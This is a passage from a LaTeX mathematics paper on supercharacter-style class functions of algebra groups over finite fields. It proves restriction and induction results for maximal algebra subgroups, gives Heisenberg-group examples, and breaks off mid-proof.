It follows that $$\sum_{\calO \in \bfOme(G)} \phi_{\calO}(x)
\overline{\phi_{\calO}(y)} = \sum_{z \in G} \del_{a,z^{-1} bz} = \ord{\left\{ z
\in G \colon a = z^{-1} bz \right\}}$$ and this clearly completes the proof.
\end{proof}
As a consequence we obtain the following additive decomposition of the
regular character $\rho_{G}$ of $G$ (which is also a consequence of
\reft{irred}).
\cor{regular}
$\dsty{\rho_{G} = \sum_{\calO \in \bfOme(G)} \phi_{\calO}(1) \phi_{\calO}}$.
\end{corol}
\begin{proof}
Let $x \in G$ be arbitrary. By the previous proposition,
$$\sum_{\calO \in \bfOme(G)} \phi_{\calO}(1) \phi_{\calO}(x) =
\del_{x,1} \ord{G} = \rho_{G}(x).$$ The result follows (by
definition of $\rho_{G}$).
\end{proof}
\sec{max}{Maximal algebra subgroups}
In this section, we consider restriction and induction of the class
functions defined in the previous section. We follow Kirillov's
theory on nilpotent Lie groups (see, for example,
\cite{corwin-greenleaf}). As before, let $A$ be a finite
dimensional $\mathbb{F}_{q}$-algebra, let $J = J(A)$ and let $G = 1+J$.
Let $U$ be a maximal multiplicatively closed $\mathbb{F}_{q}$-subspace of $J$.
Then $J^{2} \subseteq U$; otherwise, we must have $U + J^{2} = J$ and this
implies that $U = J$ (see \cite[Lemma~3.1]{isaacs1}). It follows that
$U$ is an ideal of $A$ and so $H = 1+U$ is a normal subgroup of $G$ (in
the terminology of \cite{isaacs1}, we say that $H$ is an {\bf ideal
subgroup} of $G$). Moreover, we have $\dim U = \dim J - 1$ and so
$\ord{G:H} = q$.
Let $\pi \colon J^{*} \rightarrow U^{*}$ be the natural projection (by definition,
for any $f \in J^{*}$, $\pi(f) \in U^{*}$ is the restriction of $f$ to $U$).
Then the kernel of $\pi$ is the $\mathbb{F}_{q}$-subspace $$U^{\perp} = \left\{ f \in
J^{*} \colon f(a) = 0 \text{ for all } a \in U \right\}$$ of $J^{*}$. On the other hand, for
any $f \in J^{*}$, the fibre $\pi^{-1}(\pi(f))$ of $\pi(f) \in U^{*}$ is
the subset $$\calL(f) = \left\{ g \in J^{*} \colon g(a) = f(a) \text{ for all } a \in U
\right\}$$ of $J^{*}$. It is clear that $$\calL(f) = f + U^{\perp} = \left\{
f+g \colon g \in U^{\perp} \right\}$$ for all $f \in J^{*}$.
Let $f \in J^{*}$ be arbitrary and let $f_{0}$ denote the projection
$\pi(f) \in U^{*}$. Let $\calO \in \bfOme(G)$ be the $G$-orbit which
contains $f$ and let $\calO_{0} \in \bfOme(H)$ be the $H$-orbit which
contains $f_{0}$. Since $\pi(x \cdot f) = x \cdot \pi(f)$ for all $x
\in G$ (because $H$ is normal in $G$, hence $U$ is invariant under the
adjoint $G$-action), the projection $\pi(\calO) \subseteq U^{*}$ of $\calO$
is $G$-invariant. Thus $\calO_{0} \subseteq \pi(\calO)$; in fact, $\pi(\calO)$
is a disjoint union of $H$-orbits. It follows that $$\ord{\calO_{0}} \leq
\ord{\pi(\calO)} \leq \ord{\calO}.$$ Let $\pi_{\calO} \colon \calO \rightarrow
\pi(\calO)$ denote the restriction of $\pi$ to $\calO$. Since $\pi_{\calO}$
is surjective, $\calO$ is the disjoint union $$\calO = \bigcup_{g_{0} \in
\pi(\calO)} \pi^{-1}(g_{0}).$$ Since $\pi^{-1}(\pi(g)) = \calL(g) \cap
\calO$ for all $g \in \calO$, we conclude that $$\ord{\calO} =
\sum_{g \in \Gam_{\calO}} \ord{\calL(g) \cap \calO},$$ where $\Gam_{\calO}
\subseteq \calO$ is a set of representatives of the fibres $\pi^{-1}(g_{0})$
for $g_{0} \in \pi(\calO)$. Now, we clearly have $\calL(x \cdot g) =
x \cdot \calL(g)$ for all $x \in G$ and all $g \in J^{*}$. It follows
that
\eq{inters}
x \cdot \left( \calL(g) \cap \calO \right) = \calL(x \cdot g) \cap
\calO
\end{equation}
for all $x \in G$ and all $g \in J^{*}$. In particular, we have
$\ord{\calL(g) \cap \calO} = \ord{\calL(f) \cap \calO}$ for all $g \in \calO$.
Since $\ord{\Gam_{\calO}} = \ord{\pi(\calO)}$, we conclude that
\eq{order}
\ord{\calO} = \ord{\pi(\calO)} \cdot \ord{\calL(f) \cap \calO}.
\end{equation}
In particular, we deduce that $$\ord{\calO} \leq q \ord{\pi(\calO)}$$
(because $\calL(f) = f + U^{\perp}$, hence $\ord{\calL(f)} = q$). We
claim that $\ord{\pi(\calO)}$ is a power of $q$. In fact, we have the
following.
\lem{rad}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $f \in J^{*}$ be arbitrary and let $\calO \in \bfOme(G)$
be the $G$-orbit which contains $f$. Then:
\begin{enumerate}
\al{a} The centralizer $C_{G}(f_{0})$ of $f_{0} = \pi(f)$ in $G$ is
an algebra subgroup of $G$; in fact, $C_{G}(f_{0}) = 1 + R$ where $R =
\left\{ a \in J \colon f([ab]) = 0 \text{ for all } b \in U \right\}$.
\al{b} $\ord{\pi(\calO)}$ is a power of $q$; in fact, either
$\ord{\calO} = \ord{\pi(\calO)}$, or $\ord{\calO} = q \ord{\pi(\calO)}$.
\end{enumerate}
\end{lemma}
\begin{proof}
The proof of (a) is analogous to the proof of \refp{rad}. On the
other hand, since $G$ acts transitively on $\pi(\calO)$, we have
$$\ord{\pi(\calO)} = \ord{G} \cdot \ord{C_{G}(f_{0})}^{-1} = q^{\dim J -
\dim R}.$$ The last assertion is clear because $\ord{\pi(\calO)}
\leq \ord{\calO} \leq q \ord{\pi(\calO)}$.
\end{proof}
Following \cite{kirillov2}, we say that a $G$-orbit $\calO \in \bfOme(G)$ is of
{\bf type I} (with respect to $H$) if $\ord{\calO} = \ord{\pi(\calO)}$;
otherwise, if $\ord{\calO} = q \ord{\pi(\calO)}$, we say that $\calO$ is of
{\bf type II} (with respect to $H$). The following result asserts that
our definition is, in fact, equivalent to Kirillov's definition.
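To illustrate the dichotomy, we sketch the standard example of the Heisenberg group; the verifications below are routine and are not needed in the sequel.

```latex
Let $J$ be the $\mathbb{F}_{q}$-algebra of strictly upper triangular $3 \times 3$
matrices, with basis $e_{12}, e_{23}, e_{13}$, so that $G = 1+J$ has
order $q^{3}$, and let $U = \mathbb{F}_{q} e_{12} + \mathbb{F}_{q} e_{13}$. Then $U$ is
multiplicatively closed, $J^{2} = \mathbb{F}_{q} e_{13} \subseteq U$ and $H = 1+U$
is a maximal algebra subgroup of $G$. If $f = e_{12}^{*}$, then $B_{f} =
0$ (every commutator lies in $J^{2}$ and $f(e_{13}) = 0$), hence
$$\ord{\calO} = 1 = \ord{\pi(\calO)}$$ and the orbit $\calO$ of $f$ is of
type I. If $f = e_{13}^{*}$, then $B_{f}(e_{12}, e_{23}) = f(e_{13}) =
1$ and $\operatorname{Rad}(f) = \mathbb{F}_{q} e_{13}$, hence $$\ord{\calO} = q^{2} = q
\ord{\pi(\calO)}$$ and the orbit $\calO$ of $f$ is of type II.
```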
\prop{types}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural projection.
Let $\calO \in \bfOme(G)$ be arbitrary. Then:
\begin{enumerate}
\al{a} $\calO$ is of type I (with respect to $H$) if and only
if $\calL(f) \cap \calO = \left\{ f \right\}$ for all $f \in \calO$;
\al{b} $\calO$ is of type II (with respect to $H$) if and only
if $\calL(f) \subseteq \calO$ for all $f \in \calO$.
\end{enumerate}
\end{propos}
\begin{proof}
Suppose that $\ord{\calO} = \ord{\pi(\calO)}$ (i.e., $\calO$ is of type I).
Then \refe{order} implies that $\ord{\calL(f) \cap \calO} = 1$
and so $\calL(f) \cap \calO = \left\{ f \right\}$. On the other hand,
if $\ord{\calO} = q \ord{\pi(\calO)}$ (i.e., if $\calO$ is of type II), we
must have $\ord{\calL(f) \cap \calO} = q$ and so $\calL(f) \subseteq \calO$
(because $\ord{\calL(f)} = q$). The result follows by
\refe{inters}.
\end{proof}
Now, let $n = \dim J$ and let $\bas{e}{n}$ be an $\mathbb{F}_{q}$-basis of $J$ such
that $e_{i} \in U$ for all $1 \leq i \leq n-1$. Moreover, let $M =
M(f)$ be the $n \times n$ skew-symmetric matrix which represents the bilinear
form $B_{f}$ with respect to the basis $\bas{e}{n}$. By \refp{rad},
$\ord{\calO} = q^{\rank M}$. Moreover, the matrix $M$ has the form $$M =
\begin{bmatrix} M_{0} & - \nu^{T} \\ \nu & 0 \end{bmatrix}$$ where $M_{0} = M(f_{0})$, $f_{0} = \pi(f)$, is the
$(n-1) \times (n-1)$ skew-symmetric matrix which represents the bilinear form
$B_{f_{0}} \colon U \times U \rightarrow \mathbb{F}_{q}$ with respect to the $\mathbb{F}_{q}$-basis
$\bas{e}{n-1}$ of $U$, and $\nu$ is the row vector $\nu = \left[
f([e_{n}\, e_{1}])\ \cdots\ f([e_{n}\, e_{n-1}]) \right]$. Since
$\calO_{0}$ is the $H$-orbit of the element $f_{0} \in U^{*}$, we
have $\ord{\calO_{0}} = q^{\rank M_{0}}$ (by \refp{rad}). Since $M$ and
$M_0$ are skew-symmetric matrices, they have even ranks and so, either
$\rank M = \rank M_{0}$, or $\rank M = \rank M_{0} + 2$. This concludes
the proof of the following.
\lem{order}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\calO_{0}
\in \bfOme(H)$ be such that $\calO_{0} \subseteq \pi(\calO)$. Then, either
$\ord{\calO} = \ord{\calO_{0}}$, or $\ord{\calO} = q^{2} \ord{\calO_{0}}$.
\end{lemma}
We note that, since $\ord{\calO_{0}} \leq \ord{\pi(\calO)} \leq \ord{\calO}$,
the equality $\ord{\calO} = \ord{\calO_{0}}$ implies that $\calO$ is of type
I (with respect to $H$); hence, $\ord{\calO} = q^{2} \ord{\calO_{0}}$
whenever $\calO$ is of type II (with respect to $H$). Our next result shows
that the dichotomy of the preceding lemma characterizes the type of the
$G$-orbit $\calO$ with respect to the subgroup $H$.
\prop{char}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\calO_{0}
\in \bfOme(H)$ be such that $\calO_{0} \subseteq \pi(\calO)$. Moreover, let $f
\in \calO$ be such that the projection $f_{0} = \pi(f)$ lies in
$\calO_{0}$. Then:
\begin{enumerate}
\al{a} The following are equivalent:
\begin{enumerate}
\al{i} $\calO$ is of type I (with respect to $H$);
\al{ii} $\ord{\calO} = \ord{\calO_{0}}$;
\al{iii} $\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f_{0}) + 1$;
\al{iv} $\ord{C_{G}(f)} = q \ord{C_{H}(f_{0})}$.
\end{enumerate}
\al{b} The following are equivalent:
\begin{enumerate}
\al{i} $\calO$ is of type II (with respect to $H$);
\al{ii} $\ord{\calO} = q^{2} \ord{\calO_{0}}$;
\al{iii} $\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f_{0}) - 1$;
\al{iv} $\ord{C_{G}(f)} = q^{-1} \ord{C_{H}(f_{0})}$.
\end{enumerate}
\end{enumerate}
\end{propos}
\begin{proof}
The equivalence $\impd{iii}{iv}$ (in both (a) and (b)) follows from
\refp{rad}. On the other hand, the equivalence $\impd{ii}{iii}$ (in
both (a) and (b)) follows from \refe{rad} (using also \refp{rad}).
We have already proved that $\imp{ii}{i}$ in (a) (which is equivalent
to $\imp{i}{ii}$ in (b)). Conversely, suppose that $\calO$ is of
type I (with respect to $H$). Then $\ord{\pi(\calO)} = \ord{\calO}$.
Since $G$ acts transitively on $\pi(\calO)$, we deduce that $$\ord{G} =
\ord{C_{G}(f_{0})} \cdot \ord{\pi(\calO)} = \ord{C_{G}(f_{0})} \cdot
\ord{\calO}.$$ It follows that $\ord{C_{G}(f_{0})} = \ord{C_{G}(f)}$.
Since $C_{G}(f) \subseteq C_{G}(f_{0})$, we conclude that $C_{G}(f_{0}) =
C_{G}(f)$. On the other hand, $C_{H}(f_{0}) \subseteq C_{G}(f_{0})$ and so
$C_{H}(f_{0}) \subseteq C_{G}(f)$. By the equivalence $\impd{ii}{iv}$ (in
both (a) and (b)), we conclude that $\ord{\calO} = \ord{\calO_{0}}$.
This completes the proof of $\imp{i}{ii}$ in (a). Hence, the
implication $\imp{ii}{i}$ in (b) is also true. The proof is complete.
\end{proof}
We note that, since $\calO_{0} \subseteq \pi(\calO)$, the equality $\ord{\calO} =
\ord{\calO_{0}}$ implies that $\pi(\calO) = \calO_{0}$ (hence, the
projection $\pi(\calO)$ of the $G$-orbit $\calO$ is an $H$-orbit). This
concludes the proof of part (a) of the following result.
\prop{dec}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\calO_{0}
\in \bfOme(H)$ be such that $\calO_{0} \subseteq \pi(\calO)$. Moreover, let
$f \in \calO$ be such that the projection $f_{0} = \pi(f)$ lies in
$\calO_{0}$. Then the following statements hold:
\begin{enumerate}
\al{a} If $\calO$ is of type I (with respect to $H$), then
$\pi(\calO) = \calO_{0}$ is a single $H$-orbit on $U^{*}$.
\al{b} Suppose that $\calO$ is of type II (with respect to $H$). Let
$e \in J$ be such that $J = U \+ \mathbb{F}_{q} e$ and, for each $\alp \in
\mathbb{F}_{q}$, let $x_{\alp}$ denote the element $1 + \alp e \in G$. Then
$\pi(\calO)$ is the disjoint union $$\pi({\calO}) = \bigcup_{\alp \in
\mathbb{F}_{q}} \calO_{\alp}$$ where, for each $\alp \in \mathbb{F}_{q}$, $\calO_{\alp} \subseteq
U^{*}$ is the $H$-orbit which contains the element $x_{\alp} \cdot
f_{0} \in U^{*}$. We have $$\calO_{\alp} = x_{\alp} \cdot \calO_{0} =
\left\{ x_{\alp} \cdot g \colon g \in \calO_{0} \right\}$$ for all $\alp \in
\mathbb{F}_{q}$. Moreover, the set $\left\{ x_{\alp} \colon \alp \in \mathbb{F}_{q} \right\}$
can be replaced by any set of representatives of the cosets of
$H$ in $G$.
\end{enumerate}
\end{propos}
\begin{proof}
It remains to prove part (b).
Let $\alp \in \mathbb{F}_{q}$ be arbitrary. Since $\pi$ is $G$-equivariant, we have
$x_{\alp} \cdot \pi(f) = \pi(x_{\alp} \cdot f)$ and so $x_{\alp} \cdot
f_{0} \in \pi(\calO)$ (we recall that $f_{0} = \pi(f)$). It follows
that $\calO_{\alp} \subseteq \pi(\calO)$.
Next, we prove that $\calO_{\alp} = x_{\alp} \cdot \calO_{0}$. To see this,
let $x \in H$ be arbitrary. Then $x \cdot (x_{\alp} \cdot f_{0}) = (x
x_{\alp}) \cdot f_{0} = (x_{\alp} x_{\alp}^{-1} x x_{\alp}) \cdot f_{0} =
x_{\alp} \cdot \left( (x_{\alp}^{-1} x x_{\alp}) \cdot f_{0} \right)$. Since
$H$ is normal in $G$, we have $x_{\alp}^{-1} x x_{\alp} \in H$ and so
$(x_{\alp}^{-1} x x_{\alp}) \cdot f_{0} \in \calO_{0}$. Since $x \in H$
is arbitrary, we conclude that
\eq{inc}
\calO_{\alp} \subseteq x_{\alp} \cdot \calO_{0}.
\end{equation}
It follows that $\ord{\calO_{\alp}} \leq \ord{\calO_{0}} = q^{-2}
\ord{\calO}$ (by \refp{char}) and so $\ord{\calO_{\alp}} < \ord{\calO}$.
By \refl{order}, we conclude that $\ord{\calO_{\alp}} = q^{-2} \ord{\calO}$
and so $\ord{\calO_{\alp}} = \ord{\calO_{0}} = \ord{x_{\alp} \cdot
\calO_{0}}$. By \refe{inc}, we obtain $\calO_{\alp} = x_{\alp} \cdot
\calO_{0}$ as required.
Now, suppose that $\bet \in \mathbb{F}_{q}$ is such that $x_{\bet} \cdot f_{0} \in
\calO_{\alp}$. Then, there exists $x \in H$ such that $x_{\bet} \cdot
f_{0} = x \cdot (x_{\alp} \cdot f_{0}) = (x x_{\alp}) \cdot f_{0}$. It
follows that $x_{\bet}^{-1} x x_{\alp} \in C_{G}(f_{0}) = C_{H}(f_{0})$
(the equality holding because $\calO$ is of type II). In particular,
$x_{\bet}^{-1} x x_{\bet} x_{\bet}^{-1} x_{\alp} \in H$ and so
$x_{\bet}^{-1} x_{\alp} \in H$ (because $H$ is normal in $G$ and $x
\in H$). Since $x_{\bet}^{-1} = 1 - \bet e + a$ for some $a \in
J^{2}$, we have $$x_{\bet}^{-1} x_{\alp} = 1 + (\alp - \bet) e -
(\alp \bet) e^{2} + a + \alp ae.$$ Since $e^{2}, a, ae \in J^{2}$ and $J^{2} \subseteq U$, we conclude that
$(\alp - \bet) e \in U$ and this implies that $\alp = \bet$. It follows
that the $H$-orbits $\calO_{\alp} \subseteq \pi(\calO)$, for $\alp \in \mathbb{F}_{q}$,
are all distinct. Hence, the union $\bigcup_{\alp \in \mathbb{F}_{q}} \calO_{\alp}$
is disjoint and so $$\ord{\bigcup_{\alp \in \mathbb{F}_{q}} \calO_{\alp}} = \sum_{\alp
\in \mathbb{F}_{q}} \ord{\calO_{\alp}} = q \cdot \ord{\calO_{0}} = q^{-1} \cdot
\ord{\calO} = \ord{\pi(\calO)}$$ (because $\calO$ is of type II, hence
$\ord{\calO} = q \ord{\pi(\calO)} = q^{2} \ord{\calO_{0}}$). Since
$\calO_{\alp} \subseteq \calO$ for all $\alp \in \mathbb{F}_{q}$, we conclude that
$$\pi(\calO) = \bigcup_{\alp \in \mathbb{F}_{q}} \calO_{\alp}$$ as required.
Finally, let $\Gam \subseteq G$ be a set of representatives of the cosets
of $H$ in $G$. Then $G$ is the disjoint union $$G = \bigcup_{x \in \Gam}
xH.$$ Since $\ord{G:H} = q$, we have $\ord{\Gam} = q$. Moreover,
for each $x \in \Gam$, there exists a unique $\alp \in \mathbb{F}_{q}$ such
that $x \in x_{\alp} H$. It follows that $x \cdot \calO_{0} \subseteq
x_{\alp} \cdot \calO_{0}$ and, by order considerations, the equality must
occur.
The proof is complete.
\end{proof}
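Part (b) may be checked by hand in the Heisenberg example; we sketch the (routine) computation.

```latex
Let $J$ be the $\mathbb{F}_{q}$-algebra of strictly upper triangular $3 \times 3$
matrices with basis $e_{12}, e_{23}, e_{13}$, let $U = \mathbb{F}_{q} e_{12} +
\mathbb{F}_{q} e_{13}$, $H = 1+U$ and $f = e_{13}^{*}$, so that the $G$-orbit
$\calO$ of $f$ is of type II (with respect to $H$). Here $J = U \+
\mathbb{F}_{q} e$ with $e = e_{23}$, and $x_{\alp} = 1 + \alp e_{23}$. A direct
computation gives $$x_{\alp} \cdot f_{0} = \alp e_{12}^{*} + e_{13}^{*}
\in U^{*}.$$ Since $U^{2} = \left\{ 0 \right\}$, the group $H$ acts
trivially on $U^{*}$ and each $\calO_{\alp} = \left\{ \alp e_{12}^{*} +
e_{13}^{*} \right\}$ is a singleton; hence $\pi(\calO)$ is the disjoint
union of these $q$ $H$-orbits, of total order $q = q^{-1} \ord{\calO}$.
```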
Next, given an arbitrary $G$-orbit $\calO \in \bfOme(G)$, we consider the
restriction $(\phi_{\calO})_{H}$ of the class function $\phi_{\calO}$ to
the maximal algebra subgroup $H$. For simplicity, we shall write
$\phi = \phi_{\calO}$. We recall that, by definition (see \refe{class}),
we have $$\phi(1+a) = \frac{1}{\sqrt{\ord{\calO}}} \sum_{f \in \calO}
\psi_{f}(a)$$ for all $a \in J$.
Suppose that $\calO$ is of type I. Then, by \refp{dec}, we have
$\pi(\calO) = \calO_{0}$. Let $a \in U$ be arbitrary and consider
the class function $\phi_{\calO_{0}} \in \operatorname{cf}(H)$; for simplicity, we
shall write $\phi_{0} = \phi_{\calO_{0}}$. We have $$\phi_{0}(1+a) =
\frac{1}{\sqrt{\ord{\calO_{0}}}} \sum_{g \in \calO_{0}} \psi_{g}(a) =
\frac{1}{\sqrt{\ord{\calO_{0}}}} \sum_{g \in \pi(\calO)} \psi_{g}(a).$$
On the other hand, since $\calL(f) \cap \calO = \left\{ f \right\}$ for all
$f \in \calO$ (by \refp{types}), the map $\pi$ determines naturally a
bijection between the $G$-orbit $\calO \subseteq J^{*}$ and the $H$-orbit
$\calO_{0} = \pi(\calO) \subseteq U^{*}$. Therefore $$\sum_{g \in \pi(\calO)}
\psi_{g}(a) = \sum_{f \in \calO} \psi_{f}(a).$$ Since $\ord{\calO} =
$\ord{\calO_{0}}$ (by \refp{char}), we conclude that $$\phi(1+a) =
\phi_{0}(1+a)$$ for all $a \in U$. It follows that $$\phi_{H} =
\phi_{0}.$$
Now, suppose that $\calO$ is of type II. Then, by \refp{dec},
$\pi(\calO)$ is the disjoint union $$\pi(\calO) = \bigcup_{\alp \in \mathbb{F}_{q}}
\calO_{\alp}$$ of $H$-orbits $\calO_{\alp}$ for $\alp \in \mathbb{F}_{q}$. Let $a
\in U$ be arbitrary. In this case, we have $$\sum_{g \in \pi(\calO)}
\psi_{g}(a) = \sum_{\alp \in \mathbb{F}_{q}} \sum_{g \in \calO_{\alp}}
\psi_{g}(a) = \sum_{\alp \in \mathbb{F}_{q}} \sqrt{\ord{\calO_{\alp}}} \cdot
\phi_{\alp}(1+a)$$ where, for any $\alp \in \mathbb{F}_{q}$, $\phi_{\alp}$
denotes the class function $\phi_{\calO_{\alp}} \in \operatorname{cf}(H)$. Since
$\ord{\calO_{\alp}} = q^{-2} \ord{\calO}$ for all $\alp \in \mathbb{F}_{q}$ (see
the proof of \refp{dec}), we conclude that $$\sum_{\alp \in \mathbb{F}_{q}}
\phi_{\alp}(1+a) = \frac{q}{\sqrt{\ord{\calO}}} \sum_{g \in \pi(\calO)}
\psi_{g}(a).$$ On the other hand, we have $\calL(f) \subseteq \calO$ for all
$f \in \calO$ (by \refp{types}). Hence, there exist elements $\seq{f}{r}
\in \calO$ such that $\calO$ is the disjoint union $$\calO = \calL(f_{1})
\cup \ldots \cup \calL(f_{r}).$$ It follows that $$\phi(1+a) =
\frac{1}{\sqrt{\ord{\calO}}} \sum_{f \in \calO} \psi_{f}(a) =
\frac{1}{\sqrt{\ord{\calO}}} \sum_{i=1}^{r} \sum_{f \in \calL(f_{i})}
\psi_{f}(a) = \frac{q}{\sqrt{\ord{\calO}}} \sum_{i=1}^{r}
\psi_{f_{i}}(a)$$ (because $f(a) = f_{i}(a)$ for all $f \in
\calL(f_{i})$). Finally, we clearly have $r = \ord{\pi(\calO)}$ and
$\pi(\calO) = \left\{ \pi(f_{1}), \ldots, \pi(f_{r}) \right\}$. Therefore,
$$\sum_{i=1}^{r} \psi_{f_{i}}(a) = \sum_{g \in \pi(\calO)}
\psi_{g}(a).$$ It follows that $$\phi_{H} = \sum_{\alp \in \mathbb{F}_{q}}
\phi_{\alpha}.$$ Finally, we note that, by \refp{dec}, for each $\alp
\in \mathbb{F}_{q}$, the $H$-orbit $\calO_{\alp}$ considered above may be chosen to
be $x_{\alp} \cdot \calO_{0}$. Now, let $\alp \in \mathbb{F}_{q}$ and $a \in U$ be
arbitrary. Then, $$\phi_{\alp}(1+a) = \frac{1}{\sqrt{\ord{\calO_{\alp}}}}
\sum_{g \in \calO_{\alp}} \psi_{g}(a) = \frac{1}{\sqrt{\ord{\calO_{0}}}}
\sum_{f \in \calO_{0}} \psi_{x_{\alp} \cdot f}(a).$$ Let $f \in \calO_{0}$
be arbitrary. Then, by definition, $$\psi_{x_{\alp} \cdot f}(a) =
\psi((x_{\alp} \cdot f)(a)) = \psi(f(x_{\alp}^{-1} a x_{\alp})) =
\psi_{f}(x_{\alp}^{-1} a x_{\alp}).$$ This concludes the proof of the
following.
\prop{rest}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\phi$
denote the class function $\phi_{\calO} \in \operatorname{cf}(G)$. Then, the
following statements hold:
\begin{enumerate}
\al{a} If $\calO$ is of type I (with respect to $H$), then the
restriction $\phi_{H}$ of $\phi$ to $H$ is the class function
$\phi_{0} = \phi_{\calO_{0}} \in \operatorname{cf}(H)$ corresponding to the
$H$-orbit $\calO_{0} = \pi(\calO) \subseteq U^{*}$.
\al{b} Suppose that $\calO$ is of type II (with respect to $H$).
Let $\left\{ x_{\alp} \colon \alp \in \mathbb{F}_{q} \right\}$ be a set of
representatives of the cosets of $H$ in $G$, let $\calO_{0} \in
\bfOme(H)$ be an (arbitrary) $H$-orbit satisfying $\calO_{0} \subseteq
\pi(\calO)$ and, for each $\alp \in \mathbb{F}_{q}$, let $\calO_{\alp} \in
\bfOme(H)$ be the $H$-orbit $\calO_{\alp} = x_{\alp} \cdot \calO_{0}$.
Then, the restriction $\phi_{H}$ of $\phi$ to $H$ is the sum
$$\phi_{H} = \sum_{\alp \in \mathbb{F}_{q}} \phi_{\alp}$$ of the (linearly
independent) class functions $\phi_{\alp} \in \operatorname{cf}(H)$, $\alp
\in \mathbb{F}_{q}$, which correspond to the $H$-orbits $\calO_{\alp}$,
$\alp \in \mathbb{F}_{q}$. Moreover, for each $\alp \in \mathbb{F}_{q}$, $\phi_{\alp}$ is
the class function defined by $\phi_{\alp}(x) = \phi_{0}(x_{\alp}^{-1}
x x_{\alp})$ for all $x \in H$.
\end{enumerate}
\end{propos}
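In the Heisenberg example, part (b) recovers a classical decomposition; we sketch it.

```latex
Let $J$ be the $\mathbb{F}_{q}$-algebra of strictly upper triangular $3 \times 3$
matrices with basis $e_{12}, e_{23}, e_{13}$, let $U = \mathbb{F}_{q} e_{12} +
\mathbb{F}_{q} e_{13}$, $H = 1+U$ and let $\calO$ be the $G$-orbit of $f =
e_{13}^{*}$, so that $\ord{\calO} = q^{2}$, the orbit is of type II and
$\phi = \phi_{\calO}$ has degree $\phi(1) = \sqrt{\ord{\calO}} = q$.
Since $H$ is abelian, part (b) expresses $\phi_{H}$ as the sum of the
$q$ distinct linear characters $$\phi_{\alp}(1+a) = \psi(\alp a_{12} +
a_{13}) \qquad (a = a_{12} e_{12} + a_{13} e_{13} \in U),$$ in agreement
with the classical restriction of the $q$-dimensional representation of
the Heisenberg group to an abelian (normal) subgroup of index $q$.
```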
In the next result, we use Frobenius reciprocity to obtain the
decomposition of the class function ${\phi_{\calO_{0}}}^{G} \in \operatorname{cf}(G)$
induced from the class function $\phi_{\calO_{0}} \in \operatorname{cf}(H)$ which is
associated with an arbitrary $H$-orbit $\calO_{0} \in \bfOme(H)$.
\prop{ind}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO_{0} \in \bfOme(H)$ be arbitrary and let $\calO
\in \bfOme(G)$ be an arbitrary $G$-orbit satisfying $\calO_{0} \subseteq
\pi(\calO)$. Moreover, let $\phi_{0}$ denote the class function
$\phi_{\calO_{0}} \in \operatorname{cf}(H)$. Then, the following statements hold:
\begin{enumerate}
\al{a} Suppose that $\calO$ is of type I (with respect to $H$). Let
$e \in J$ be such that $J = U \+ \mathbb{F}_{q} e$ and let $e^{*} \in
U^{\perp}$ be such that $e^{*}(e) = 1$. Let $f \in \calO$ be
arbitrary and, for each $\alp \in \mathbb{F}_{q}$, let $\calO(\alp) \in \bfOme(G)$
denote the $G$-orbit which contains the element $f + \alp e^{*} \in
J^{*}$. Then, the $G$-orbits $\calO(\alp)$, for $\alp \in \mathbb{F}_{q}$,
are all distinct and the induced class function ${\phi_{0}}^{G}$ is
the sum $${\phi_{0}}^{G} = \sum_{\alp \in \mathbb{F}_{q}} \phi_{\calO(\alp)}$$ of
the (linearly independent) class functions $\phi_{\calO(\alp)}$, for
$\alp \in \mathbb{F}_{q}$.
\al{b} If $\calO$ is of type II (with respect to $H$), then
${\phi_{0}}^{G}$ is the class function $\phi = \phi_{\calO}$ which
corresponds to the $G$-orbit $\calO \in \bfOme(G)$.
\end{enumerate}
\end{propos}
\begin{proof}
By \refp{ortho}, we have $${\phi_{0}}^{G} = \sum_{\calO^{\prime} \in
\bfOme(G)} \mu_{\calO^{\prime}} \phi_{\calO^{\prime}}$$ where $\mu_{\calO^{\prime}} =
\left\langle {\phi_{0}}^{G}, \phi_{\calO^{\prime}} \right\rangle_{G}$ for all $\calO^{\prime} \in
\bfOme(G)$. Let $\calO^{\prime} \in \bfOme(G)$ be arbitrary. By Frobenius reciprocity,
we have $$\left\langle {\phi_{0}}^{G}, \phi_{\calO^{\prime}} \right\rangle_{G} = \left\langle \phi_{0},
(\phi_{\calO^{\prime}})_{H} \right\rangle_{H}.$$ Therefore, by \refp{rest},
$\mu_{\calO^{\prime}} \neq 0$ if and only if $\calO_{0} \subseteq \pi(\calO^{\prime})$;
moreover, if this is the case, we have $\mu_{\calO^{\prime}} = 1$. On the
other hand, let $f \in \calO$ be such that $\pi(f) \in \calO_{0}$; we
note that, in the case where $\calO$ is of type I (with respect to $H$),
we have $\pi(\calO) = \calO_{0}$ (by \refp{dec}) and so $\pi(f) \in
\calO_{0}$ for all $f \in \calO$. Let $\calO^{\prime} \in \bfOme(G)$ be such that
$\calO_{0} \subseteq \pi(\calO^{\prime})$. Then $\pi(f) = \pi(f^{\prime})$ for some $f^{\prime}
\in \calO^{\prime}$, hence $f^{\prime} \in \calL(f)$. Since $U^{\perp} = \mathbb{F}_{q}
e^{*}$, we have $\calL(f) = f + \mathbb{F}_{q} e^{*}$ and so there exists $\alp \in
\mathbb{F}_{q}$ such that $f^{\prime} = f + \alp e^{*}$. Therefore,
